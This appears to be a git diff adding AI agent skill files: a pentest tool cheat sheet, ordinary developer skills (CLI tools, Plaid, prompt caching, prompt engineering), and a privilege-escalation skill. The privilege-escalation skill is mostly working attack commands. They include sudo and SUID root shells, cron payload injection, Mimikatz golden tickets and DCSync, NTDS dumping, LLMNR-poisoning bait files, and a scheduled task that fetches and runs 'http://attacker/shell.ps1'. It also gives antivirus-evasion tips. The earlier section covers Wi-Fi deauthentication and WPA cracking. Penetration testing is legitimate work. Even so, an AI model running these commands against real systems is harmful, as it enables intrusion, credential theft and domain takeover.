zip2john file.zip > zip_hash.txt
|
||||
john zip_hash.txt
|
||||
```
|
||||
|
||||
### 7. Aircrack-ng Commands
|
||||
|
||||
```bash
|
||||
# Monitor mode
|
||||
airmon-ng start wlan0
|
||||
|
||||
# Capture packets
|
||||
airodump-ng wlan0mon
|
||||
|
||||
# Target specific network
|
||||
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
|
||||
|
||||
# Deauth attack
|
||||
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
|
||||
|
||||
# Crack WPA handshake
|
||||
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
|
||||
```
|
||||
|
||||
### 8. Wireshark/Tshark Commands
|
||||
|
||||
```bash
|
||||
# Capture traffic
|
||||
tshark -i eth0 -w capture.pcap
|
||||
|
||||
# Read capture file
|
||||
tshark -r capture.pcap
|
||||
|
||||
# Filter by protocol
|
||||
tshark -r capture.pcap -Y "http"
|
||||
|
||||
# Filter by IP
|
||||
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
|
||||
|
||||
# Extract HTTP data
|
||||
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Common Port Scans
|
||||
|
||||
```bash
|
||||
# Quick scan
|
||||
nmap -F 192.168.1.1
|
||||
|
||||
# Full comprehensive
|
||||
nmap -sV -sC -A -p- 192.168.1.1
|
||||
|
||||
# Fast with version
|
||||
nmap -sV -T4 192.168.1.1
|
||||
```
|
||||
|
||||
### Password Hash Types
|
||||
|
||||
| Mode | Type |
|
||||
|------|------|
|
||||
| 0 | MD5 |
|
||||
| 100 | SHA1 |
|
||||
| 1000 | NTLM |
|
||||
| 1800 | sha512crypt |
|
||||
| 3200 | bcrypt |
|
||||
| 13100 | Kerberoast |
|
||||
|
||||
## Constraints
|
||||
|
||||
- Always have written authorization
|
||||
- Some scans are noisy and detectable
|
||||
- Brute forcing may lock accounts
|
||||
- Rate limiting affects tools
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Quick Vulnerability Scan
|
||||
|
||||
```bash
|
||||
nmap -sV --script vuln 192.168.1.1
|
||||
```
|
||||
|
||||
### Example 2: Web App Test
|
||||
|
||||
```bash
|
||||
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| Scan too slow | Increase timing (-T4, -T5) |
|
||||
| Ports filtered | Try different scan types |
|
||||
| Exploit fails | Check target version compatibility |
|
||||
| Passwords not cracking | Try larger wordlists, rules |
|
||||
289
skills/personal-tool-builder/SKILL.md
Normal file
289
skills/personal-tool-builder/SKILL.md
Normal file
@@ -0,0 +1,289 @@
|
||||
---
|
||||
name: personal-tool-builder
|
||||
description: "Expert in building custom tools that solve your own problems first. The best products often start as personal tools - scratch your own itch, build for yourself, then discover others have the same itch. Covers rapid prototyping, local-first apps, CLI tools, scripts that grow into products, and the art of dogfooding. Use when: build a tool, personal tool, scratch my itch, solve my problem, CLI tool."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Personal Tool Builder
|
||||
|
||||
**Role**: Personal Tool Architect
|
||||
|
||||
You believe the best tools come from real problems. You've built dozens of
|
||||
personal tools - some stayed personal, others became products used by thousands.
|
||||
You know that building for yourself means you have perfect product-market fit
|
||||
with at least one user. You build fast, iterate constantly, and only polish
|
||||
what proves useful.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Personal productivity tools
|
||||
- Scratch-your-own-itch methodology
|
||||
- Rapid prototyping for personal use
|
||||
- CLI tool development
|
||||
- Local-first applications
|
||||
- Script-to-product evolution
|
||||
- Dogfooding practices
|
||||
- Personal automation
|
||||
|
||||
## Patterns
|
||||
|
||||
### Scratch Your Own Itch
|
||||
|
||||
Building from personal pain points
|
||||
|
||||
**When to use**: When starting any personal tool
|
||||
|
||||
```javascript
|
||||
## The Itch-to-Tool Process
|
||||
|
||||
### Identifying Real Itches
|
||||
```
|
||||
Good itches:
|
||||
- "I do this manually 10x per day"
|
||||
- "This takes me 30 minutes every time"
|
||||
- "I wish X just did Y"
|
||||
- "Why doesn't this exist?"
|
||||
|
||||
Bad itches (usually):
|
||||
- "People should want this"
|
||||
- "This would be cool"
|
||||
- "There's a market for..."
|
||||
- "AI could probably..."
|
||||
```
|
||||
|
||||
### The 10-Minute Test
|
||||
| Question | Answer |
|
||||
|----------|--------|
|
||||
| Can you describe the problem in one sentence? | Required |
|
||||
| Do you experience this problem weekly? | Must be yes |
|
||||
| Have you tried solving it manually? | Must have |
|
||||
| Would you use this daily? | Should be yes |
|
||||
|
||||
### Start Ugly
|
||||
```
|
||||
Day 1: Script that solves YOUR problem
|
||||
- No UI, just works
|
||||
- Hardcoded paths, your data
|
||||
- Zero error handling
|
||||
- You understand every line
|
||||
|
||||
Week 1: Script that works reliably
|
||||
- Handle your edge cases
|
||||
- Add the features YOU need
|
||||
- Still ugly, but robust
|
||||
|
||||
Month 1: Tool that might help others
|
||||
- Basic docs (for future you)
|
||||
- Config instead of hardcoding
|
||||
- Consider sharing
|
||||
```
|
||||
```
|
||||
|
||||
### CLI Tool Architecture
|
||||
|
||||
Building command-line tools that last
|
||||
|
||||
**When to use**: When building terminal-based tools
|
||||
|
||||
```python
|
||||
## CLI Tool Stack
|
||||
|
||||
### Node.js CLI Stack
|
||||
```javascript
|
||||
// package.json
|
||||
{
|
||||
"name": "my-tool",
|
||||
"version": "1.0.0",
|
||||
"bin": {
|
||||
"mytool": "./bin/cli.js"
|
||||
},
|
||||
"dependencies": {
|
||||
"commander": "^12.0.0", // Argument parsing
|
||||
"chalk": "^5.3.0", // Colors
|
||||
"ora": "^8.0.0", // Spinners
|
||||
"inquirer": "^9.2.0", // Interactive prompts
|
||||
"conf": "^12.0.0" // Config storage
|
||||
}
|
||||
}
|
||||
|
||||
// bin/cli.js
|
||||
#!/usr/bin/env node
|
||||
import { Command } from 'commander';
|
||||
import chalk from 'chalk';
|
||||
|
||||
const program = new Command();
|
||||
|
||||
program
|
||||
.name('mytool')
|
||||
.description('What it does in one line')
|
||||
.version('1.0.0');
|
||||
|
||||
program
|
||||
.command('do-thing')
|
||||
.description('Does the thing')
|
||||
.option('-v, --verbose', 'Verbose output')
|
||||
.action(async (options) => {
|
||||
// Your logic here
|
||||
});
|
||||
|
||||
program.parse();
|
||||
```
|
||||
|
||||
### Python CLI Stack
|
||||
```python
|
||||
# Using Click (recommended)
|
||||
import click
|
||||
|
||||
@click.group()
|
||||
def cli():
|
||||
"""Tool description."""
|
||||
pass
|
||||
|
||||
@cli.command()
|
||||
@click.option('--name', '-n', required=True)
|
||||
@click.option('--verbose', '-v', is_flag=True)
|
||||
def process(name, verbose):
|
||||
"""Process something."""
|
||||
click.echo(f'Processing {name}')
|
||||
|
||||
if __name__ == '__main__':
|
||||
cli()
|
||||
```
|
||||
|
||||
### Distribution
|
||||
| Method | Complexity | Reach |
|
||||
|--------|------------|-------|
|
||||
| npm publish | Low | Node devs |
|
||||
| pip install | Low | Python devs |
|
||||
| Homebrew tap | Medium | Mac users |
|
||||
| Binary release | Medium | Everyone |
|
||||
| Docker image | Medium | Tech users |
|
||||
```
|
||||
|
||||
### Local-First Apps
|
||||
|
||||
Apps that work offline and own your data
|
||||
|
||||
**When to use**: When building personal productivity apps
|
||||
|
||||
```python
|
||||
## Local-First Architecture
|
||||
|
||||
### Why Local-First for Personal Tools
|
||||
```
|
||||
Benefits:
|
||||
- Works offline
|
||||
- Your data stays yours
|
||||
- No server costs
|
||||
- Instant, no latency
|
||||
- Works forever (no shutdown)
|
||||
|
||||
Trade-offs:
|
||||
- Sync is hard
|
||||
- No collaboration (initially)
|
||||
- Platform-specific work
|
||||
```
|
||||
|
||||
### Stack Options
|
||||
| Stack | Best For | Complexity |
|
||||
|-------|----------|------------|
|
||||
| Electron + SQLite | Desktop apps | Medium |
|
||||
| Tauri + SQLite | Lightweight desktop | Medium |
|
||||
| Browser + IndexedDB | Web apps | Low |
|
||||
| PWA + OPFS | Mobile-friendly | Low |
|
||||
| CLI + JSON files | Scripts | Very Low |
|
||||
|
||||
### Simple Local Storage
|
||||
```javascript
|
||||
// For simple tools: JSON file storage
|
||||
import { readFileSync, writeFileSync, existsSync } from 'fs';
|
||||
import { homedir } from 'os';
|
||||
import { join } from 'path';
|
||||
|
||||
const DATA_DIR = join(homedir(), '.mytool');
|
||||
const DATA_FILE = join(DATA_DIR, 'data.json');
|
||||
|
||||
function loadData() {
|
||||
if (!existsSync(DATA_FILE)) return { items: [] };
|
||||
return JSON.parse(readFileSync(DATA_FILE, 'utf8'));
|
||||
}
|
||||
|
||||
function saveData(data) {
|
||||
if (!existsSync(DATA_DIR)) mkdirSync(DATA_DIR);
|
||||
writeFileSync(DATA_FILE, JSON.stringify(data, null, 2));
|
||||
}
|
||||
```
|
||||
|
||||
### SQLite for More Complex Tools
|
||||
```javascript
|
||||
// better-sqlite3 for Node.js
|
||||
import Database from 'better-sqlite3';
|
||||
import { join } from 'path';
|
||||
import { homedir } from 'os';
|
||||
|
||||
const db = new Database(join(homedir(), '.mytool', 'data.db'));
|
||||
|
||||
// Create tables on first run
|
||||
db.exec(`
|
||||
CREATE TABLE IF NOT EXISTS items (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
name TEXT NOT NULL,
|
||||
created_at DATETIME DEFAULT CURRENT_TIMESTAMP
|
||||
)
|
||||
`);
|
||||
|
||||
// Fast synchronous queries
|
||||
const items = db.prepare('SELECT * FROM items').all();
|
||||
```
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Building for Imaginary Users
|
||||
|
||||
**Why bad**: No real feedback loop.
|
||||
Building features no one needs.
|
||||
Giving up because no motivation.
|
||||
Solving the wrong problem.
|
||||
|
||||
**Instead**: Build for yourself first.
|
||||
Real problem = real motivation.
|
||||
You're the first tester.
|
||||
Expand users later.
|
||||
|
||||
### ❌ Over-Engineering Personal Tools
|
||||
|
||||
**Why bad**: Takes forever to build.
|
||||
Harder to modify later.
|
||||
Complexity kills motivation.
|
||||
Perfect is enemy of done.
|
||||
|
||||
**Instead**: Minimum viable script.
|
||||
Add complexity when needed.
|
||||
Refactor only when it hurts.
|
||||
Ugly but working > pretty but incomplete.
|
||||
|
||||
### ❌ Not Dogfooding
|
||||
|
||||
**Why bad**: Missing obvious UX issues.
|
||||
Not finding real bugs.
|
||||
Features that don't help.
|
||||
No passion for improvement.
|
||||
|
||||
**Instead**: Use your tool daily.
|
||||
Feel the pain of bad UX.
|
||||
Fix what annoys YOU.
|
||||
Your needs = user needs.
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Tool only works in your specific environment | medium | ## Making Tools Portable |
|
||||
| Configuration becomes unmanageable | medium | ## Taming Configuration |
|
||||
| Personal tool becomes unmaintained | low | ## Sustainable Personal Tools |
|
||||
| Personal tools with security vulnerabilities | high | ## Security in Personal Tools |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `micro-saas-launcher`, `browser-extension-builder`, `workflow-automation`, `backend`
|
||||
50
skills/plaid-fintech/SKILL.md
Normal file
50
skills/plaid-fintech/SKILL.md
Normal file
@@ -0,0 +1,50 @@
|
||||
---
|
||||
name: plaid-fintech
|
||||
description: "Expert patterns for Plaid API integration including Link token flows, transactions sync, identity verification, Auth for ACH, balance checks, webhook handling, and fintech compliance best practices. Use when: plaid, bank account linking, bank connection, ach, account aggregation."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Plaid Fintech
|
||||
|
||||
## Patterns
|
||||
|
||||
### Link Token Creation and Exchange
|
||||
|
||||
Create a link_token for Plaid Link, exchange public_token for access_token.
|
||||
Link tokens are short-lived, one-time use. Access tokens don't expire but
|
||||
may need updating when users change passwords.
|
||||
|
||||
|
||||
### Transactions Sync
|
||||
|
||||
Use /transactions/sync for incremental transaction updates. More efficient
|
||||
than /transactions/get. Handle webhooks for real-time updates instead of
|
||||
polling.
|
||||
|
||||
|
||||
### Item Error Handling and Update Mode
|
||||
|
||||
Handle ITEM_LOGIN_REQUIRED errors by putting users through Link update mode.
|
||||
Listen for PENDING_DISCONNECT webhook to proactively prompt users.
|
||||
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Storing Access Tokens in Plain Text
|
||||
|
||||
### ❌ Polling Instead of Webhooks
|
||||
|
||||
### ❌ Ignoring Item Errors
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
330
skills/privilege-escalation-methods/SKILL.md
Normal file
330
skills/privilege-escalation-methods/SKILL.md
Normal file
@@ -0,0 +1,330 @@
|
||||
---
|
||||
name: Privilege Escalation Methods
|
||||
description: This skill should be used when the user asks to "escalate privileges", "get root access", "become administrator", "privesc techniques", "abuse sudo", "exploit SUID binaries", "Kerberoasting", "pass-the-ticket", "token impersonation", or needs guidance on post-exploitation privilege escalation for Linux or Windows systems.
|
||||
---
|
||||
|
||||
# Privilege Escalation Methods
|
||||
|
||||
## Purpose
|
||||
|
||||
Provide comprehensive techniques for escalating privileges from a low-privileged user to root/administrator access on compromised Linux and Windows systems. Essential for penetration testing post-exploitation phase and red team operations.
|
||||
|
||||
## Inputs/Prerequisites
|
||||
|
||||
- Initial low-privilege shell access on target system
|
||||
- Kali Linux or penetration testing distribution
|
||||
- Tools: Mimikatz, PowerView, PowerUpSQL, Responder, Impacket, Rubeus
|
||||
- Understanding of Windows/Linux privilege models
|
||||
- For AD attacks: Domain user credentials and network access to DC
|
||||
|
||||
## Outputs/Deliverables
|
||||
|
||||
- Root or Administrator shell access
|
||||
- Extracted credentials and hashes
|
||||
- Persistent access mechanisms
|
||||
- Domain compromise (for AD environments)
|
||||
|
||||
---
|
||||
|
||||
## Core Techniques
|
||||
|
||||
### Linux Privilege Escalation
|
||||
|
||||
#### 1. Abusing Sudo Binaries
|
||||
|
||||
Exploit misconfigured sudo permissions using GTFOBins techniques:
|
||||
|
||||
```bash
|
||||
# Check sudo permissions
|
||||
sudo -l
|
||||
|
||||
# Exploit common binaries
|
||||
sudo vim -c ':!/bin/bash'
|
||||
sudo find /etc/passwd -exec /bin/bash \;
|
||||
sudo awk 'BEGIN {system("/bin/bash")}'
|
||||
sudo python -c 'import pty;pty.spawn("/bin/bash")'
|
||||
sudo perl -e 'exec "/bin/bash";'
|
||||
sudo less /etc/hosts # then type: !bash
|
||||
sudo man man # then type: !bash
|
||||
sudo env /bin/bash
|
||||
```
|
||||
|
||||
#### 2. Abusing Scheduled Tasks (Cron)
|
||||
|
||||
```bash
|
||||
# Find writable cron scripts
|
||||
ls -la /etc/cron*
|
||||
cat /etc/crontab
|
||||
|
||||
# Inject payload into writable script
|
||||
echo 'chmod +s /bin/bash' > /home/user/systemupdate.sh
|
||||
chmod +x /home/user/systemupdate.sh
|
||||
|
||||
# Wait for execution, then:
|
||||
/bin/bash -p
|
||||
```
|
||||
|
||||
#### 3. Abusing Capabilities
|
||||
|
||||
```bash
|
||||
# Find binaries with capabilities
|
||||
getcap -r / 2>/dev/null
|
||||
|
||||
# Python with cap_setuid
|
||||
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
|
||||
|
||||
# Perl with cap_setuid
|
||||
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
|
||||
|
||||
# Tar with cap_dac_read_search (read any file)
|
||||
/usr/bin/tar -cvf key.tar /root/.ssh/id_rsa
|
||||
/usr/bin/tar -xvf key.tar
|
||||
```
|
||||
|
||||
#### 4. NFS Root Squashing
|
||||
|
||||
```bash
|
||||
# Check for NFS shares
|
||||
showmount -e <victim_ip>
|
||||
|
||||
# Mount and exploit no_root_squash
|
||||
mkdir /tmp/mount
|
||||
mount -o rw,vers=2 <victim_ip>:/tmp /tmp/mount
|
||||
cd /tmp/mount
|
||||
cp /bin/bash .
|
||||
chmod +s bash
|
||||
```
|
||||
|
||||
#### 5. MySQL Running as Root
|
||||
|
||||
```bash
|
||||
# If MySQL runs as root
|
||||
mysql -u root -p
|
||||
\! chmod +s /bin/bash
|
||||
exit
|
||||
/bin/bash -p
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Windows Privilege Escalation
|
||||
|
||||
#### 1. Token Impersonation
|
||||
|
||||
```powershell
|
||||
# Using SweetPotato (SeImpersonatePrivilege)
|
||||
execute-assembly sweetpotato.exe -p beacon.exe
|
||||
|
||||
# Using SharpImpersonation
|
||||
SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
|
||||
```
|
||||
|
||||
#### 2. Service Abuse
|
||||
|
||||
```powershell
|
||||
# Using PowerUp
|
||||
. .\PowerUp.ps1
|
||||
Invoke-ServiceAbuse -Name 'vds' -UserName 'domain\user1'
|
||||
Invoke-ServiceAbuse -Name 'browser' -UserName 'domain\user1'
|
||||
```
|
||||
|
||||
#### 3. Abusing SeBackupPrivilege
|
||||
|
||||
```powershell
|
||||
import-module .\SeBackupPrivilegeUtils.dll
|
||||
import-module .\SeBackupPrivilegeCmdLets.dll
|
||||
Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\temp\ntds.dit
|
||||
```
|
||||
|
||||
#### 4. Abusing SeLoadDriverPrivilege
|
||||
|
||||
```powershell
|
||||
# Load vulnerable Capcom driver
|
||||
.\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
|
||||
.\ExploitCapcom.exe
|
||||
```
|
||||
|
||||
#### 5. Abusing GPO
|
||||
|
||||
```powershell
|
||||
.\SharpGPOAbuse.exe --AddComputerTask --Taskname "Update" `
|
||||
--Author DOMAIN\<USER> --Command "cmd.exe" `
|
||||
--Arguments "/c net user Administrator Password!@# /domain" `
|
||||
--GPOName "ADDITIONAL DC CONFIGURATION"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Active Directory Attacks
|
||||
|
||||
#### 1. Kerberoasting
|
||||
|
||||
```bash
|
||||
# Using Impacket
|
||||
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.100 -request
|
||||
|
||||
# Using CrackMapExec
|
||||
crackmapexec ldap 10.0.2.11 -u 'user' -p 'pass' --kdcHost 10.0.2.11 --kerberoast output.txt
|
||||
```
|
||||
|
||||
#### 2. AS-REP Roasting
|
||||
|
||||
```powershell
|
||||
.\Rubeus.exe asreproast
|
||||
```
|
||||
|
||||
#### 3. Golden Ticket
|
||||
|
||||
```powershell
|
||||
# DCSync to get krbtgt hash
|
||||
mimikatz# lsadump::dcsync /user:krbtgt
|
||||
|
||||
# Create golden ticket
|
||||
mimikatz# kerberos::golden /user:Administrator /domain:domain.local `
|
||||
/sid:S-1-5-21-... /rc4:<NTLM_HASH> /id:500
|
||||
```
|
||||
|
||||
#### 4. Pass-the-Ticket
|
||||
|
||||
```powershell
|
||||
.\Rubeus.exe asktgt /user:USER$ /rc4:<NTLM_HASH> /ptt
|
||||
klist # Verify ticket
|
||||
```
|
||||
|
||||
#### 5. Golden Ticket with Scheduled Tasks
|
||||
|
||||
```powershell
|
||||
# 1. Elevate and dump credentials
|
||||
mimikatz# token::elevate
|
||||
mimikatz# vault::cred /patch
|
||||
mimikatz# lsadump::lsa /patch
|
||||
|
||||
# 2. Create golden ticket
|
||||
mimikatz# kerberos::golden /user:Administrator /rc4:<HASH> `
|
||||
/domain:DOMAIN /sid:<SID> /ticket:ticket.kirbi
|
||||
|
||||
# 3. Create scheduled task
|
||||
schtasks /create /S DOMAIN /SC Weekly /RU "NT Authority\SYSTEM" `
|
||||
/TN "enterprise" /TR "powershell.exe -c 'iex (iwr http://attacker/shell.ps1)'"
|
||||
schtasks /run /s DOMAIN /TN "enterprise"
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Credential Harvesting
|
||||
|
||||
#### LLMNR Poisoning
|
||||
|
||||
```bash
|
||||
# Start Responder
|
||||
responder -I eth1 -v
|
||||
|
||||
# Create malicious shortcut (Book.url)
|
||||
[InternetShortcut]
|
||||
URL=https://facebook.com
|
||||
IconIndex=0
|
||||
IconFile=\\attacker_ip\not_found.ico
|
||||
```
|
||||
|
||||
#### NTLM Relay
|
||||
|
||||
```bash
|
||||
responder -I eth1 -v
|
||||
ntlmrelayx.py -tf targets.txt -smb2support
|
||||
```
|
||||
|
||||
#### Dumping with VSS
|
||||
|
||||
```powershell
|
||||
vssadmin create shadow /for=C:
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\
|
||||
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Technique | OS | Domain Required | Tool |
|
||||
|-----------|-----|-----------------|------|
|
||||
| Sudo Binary Abuse | Linux | No | GTFOBins |
|
||||
| Cron Job Exploit | Linux | No | Manual |
|
||||
| Capability Abuse | Linux | No | getcap |
|
||||
| NFS no_root_squash | Linux | No | mount |
|
||||
| Token Impersonation | Windows | No | SweetPotato |
|
||||
| Service Abuse | Windows | No | PowerUp |
|
||||
| Kerberoasting | Windows | Yes | Rubeus/Impacket |
|
||||
| AS-REP Roasting | Windows | Yes | Rubeus |
|
||||
| Golden Ticket | Windows | Yes | Mimikatz |
|
||||
| Pass-the-Ticket | Windows | Yes | Rubeus |
|
||||
| DCSync | Windows | Yes | Mimikatz |
|
||||
| LLMNR Poisoning | Windows | Yes | Responder |
|
||||
|
||||
---
|
||||
|
||||
## Constraints
|
||||
|
||||
**Must:**
|
||||
- Have initial shell access before attempting escalation
|
||||
- Verify target OS and environment before selecting technique
|
||||
- Use appropriate tool for domain vs local escalation
|
||||
|
||||
**Must Not:**
|
||||
- Attempt techniques on production systems without authorization
|
||||
- Leave persistence mechanisms without client approval
|
||||
- Ignore detection mechanisms (EDR, SIEM)
|
||||
|
||||
**Should:**
|
||||
- Enumerate thoroughly before exploitation
|
||||
- Document all successful escalation paths
|
||||
- Clean up artifacts after engagement
|
||||
|
||||
---
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Linux Sudo to Root
|
||||
|
||||
```bash
|
||||
# Check sudo permissions
|
||||
$ sudo -l
|
||||
User www-data may run the following commands:
|
||||
(root) NOPASSWD: /usr/bin/vim
|
||||
|
||||
# Exploit vim
|
||||
$ sudo vim -c ':!/bin/bash'
|
||||
root@target:~# id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
||||
### Example 2: Windows Kerberoasting
|
||||
|
||||
```bash
|
||||
# Request service tickets
|
||||
$ GetUserSPNs.py domain.local/jsmith:Password123 -dc-ip 10.10.10.1 -request
|
||||
|
||||
# Crack with hashcat
|
||||
$ hashcat -m 13100 hashes.txt rockyou.txt
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
| Issue | Solution |
|
||||
|-------|----------|
|
||||
| sudo -l requires password | Try other enumeration (SUID, cron, capabilities) |
|
||||
| Mimikatz blocked by AV | Use Invoke-Mimikatz or SafetyKatz |
|
||||
| Kerberoasting returns no hashes | Check for service accounts with SPNs |
|
||||
| Token impersonation fails | Verify SeImpersonatePrivilege is present |
|
||||
| NFS mount fails | Check NFS version compatibility (vers=2,3,4) |
|
||||
|
||||
---
|
||||
|
||||
## Additional Resources
|
||||
|
||||
For detailed enumeration scripts, use:
|
||||
- **LinPEAS**: Linux privilege escalation enumeration
|
||||
- **WinPEAS**: Windows privilege escalation enumeration
|
||||
- **BloodHound**: Active Directory attack path mapping
|
||||
- **GTFOBins**: Unix binary exploitation reference
|
||||
61
skills/prompt-caching/SKILL.md
Normal file
61
skills/prompt-caching/SKILL.md
Normal file
@@ -0,0 +1,61 @@
|
||||
---
|
||||
name: prompt-caching
|
||||
description: "Caching strategies for LLM prompts including Anthropic prompt caching, response caching, and CAG (Cache Augmented Generation) Use when: prompt caching, cache prompt, response cache, cag, cache augmented."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Prompt Caching
|
||||
|
||||
You're a caching specialist who has reduced LLM costs by 90% through strategic caching.
|
||||
You've implemented systems that cache at multiple levels: prompt prefixes, full responses,
|
||||
and semantic similarity matches.
|
||||
|
||||
You understand that LLM caching is different from traditional caching—prompts have
|
||||
prefixes that can be cached, responses vary with temperature, and semantic similarity
|
||||
often matters more than exact match.
|
||||
|
||||
Your core principles:
|
||||
1. Cache at the right level—prefix, response, or both
|
||||
2. K
|
||||
|
||||
## Capabilities
|
||||
|
||||
- prompt-cache
|
||||
- response-cache
|
||||
- kv-cache
|
||||
- cag-patterns
|
||||
- cache-invalidation
|
||||
|
||||
## Patterns
|
||||
|
||||
### Anthropic Prompt Caching
|
||||
|
||||
Use Claude's native prompt caching for repeated prefixes
|
||||
|
||||
### Response Caching
|
||||
|
||||
Cache full LLM responses for identical or similar queries
|
||||
|
||||
### Cache Augmented Generation (CAG)
|
||||
|
||||
Pre-cache documents in prompt instead of RAG retrieval
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Caching with High Temperature
|
||||
|
||||
### ❌ No Cache Invalidation
|
||||
|
||||
### ❌ Caching Everything
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Cache miss causes latency spike with additional overhead | high | // Optimize for cache misses, not just hits |
|
||||
| Cached responses become incorrect over time | high | // Implement proper cache invalidation |
|
||||
| Prompt caching doesn't work due to prefix changes | medium | // Structure prompts for optimal caching |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `context-window-management`, `rag-implementation`, `conversation-memory`
|
||||
93
skills/prompt-engineer/SKILL.md
Normal file
93
skills/prompt-engineer/SKILL.md
Normal file
@@ -0,0 +1,93 @@
|
||||
---
|
||||
name: prompt-engineer
|
||||
description: "Expert in designing effective prompts for LLM-powered applications. Masters prompt structure, context management, output formatting, and prompt evaluation. Use when: prompt engineering, system prompt, few-shot, chain of thought, prompt design."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Prompt Engineer
|
||||
|
||||
**Role**: LLM Prompt Architect
|
||||
|
||||
I translate intent into instructions that LLMs actually follow. I know
|
||||
that prompts are programming - they need the same rigor as code. I iterate
|
||||
relentlessly because small changes have big effects. I evaluate systematically
|
||||
because intuition about prompt quality is often wrong.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Prompt design and optimization
|
||||
- System prompt architecture
|
||||
- Context window management
|
||||
- Output format specification
|
||||
- Prompt testing and evaluation
|
||||
- Few-shot example design
|
||||
|
||||
## Requirements
|
||||
|
||||
- LLM fundamentals
|
||||
- Understanding of tokenization
|
||||
- Basic programming
|
||||
|
||||
## Patterns
|
||||
|
||||
### Structured System Prompt
|
||||
|
||||
Well-organized system prompt with clear sections
|
||||
|
||||
```javascript
|
||||
- Role: who the model is
|
||||
- Context: relevant background
|
||||
- Instructions: what to do
|
||||
- Constraints: what NOT to do
|
||||
- Output format: expected structure
|
||||
- Examples: demonstration of correct behavior
|
||||
```
|
||||
|
||||
### Few-Shot Examples
|
||||
|
||||
Include examples of desired behavior
|
||||
|
||||
```javascript
|
||||
- Show 2-5 diverse examples
|
||||
- Include edge cases in examples
|
||||
- Match example difficulty to expected inputs
|
||||
- Use consistent formatting across examples
|
||||
- Include negative examples when helpful
|
||||
```
|
||||
|
||||
### Chain-of-Thought
|
||||
|
||||
Request step-by-step reasoning
|
||||
|
||||
```javascript
|
||||
- Ask model to think step by step
|
||||
- Provide reasoning structure
|
||||
- Request explicit intermediate steps
|
||||
- Parse reasoning separately from answer
|
||||
- Use for debugging model failures
|
||||
```
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Vague Instructions
|
||||
|
||||
### ❌ Kitchen Sink Prompt
|
||||
|
||||
### ❌ No Negative Instructions
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Using imprecise language in prompts | high | Be explicit: |
|
||||
| Expecting specific format without specifying it | high | Specify format explicitly: |
|
||||
| Only saying what to do, not what to avoid | medium | Include explicit don'ts: |
|
||||
| Changing prompts without measuring impact | medium | Systematic evaluation: |
|
||||
| Including irrelevant context 'just in case' | medium | Curate context: |
|
||||
| Biased or unrepresentative examples | medium | Diverse examples: |
|
||||
| Using default temperature for all tasks | medium | Task-appropriate temperature: |
|
||||
| Not considering prompt injection in user input | high | Defend against injection: |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `ai-agents-architect`, `rag-engineer`, `backend`, `product-manager`
|
||||
322
skills/prompt-library/SKILL.md
Normal file
322
skills/prompt-library/SKILL.md
Normal file
@@ -0,0 +1,322 @@
|
||||
---
|
||||
name: prompt-library
|
||||
description: "Curated collection of high-quality prompts for various use cases. Includes role-based prompts, task-specific templates, and prompt refinement techniques. Use when user needs prompt templates, role-play prompts, or ready-to-use prompt examples for coding, writing, analysis, or creative tasks."
|
||||
---
|
||||
|
||||
# 📝 Prompt Library
|
||||
|
||||
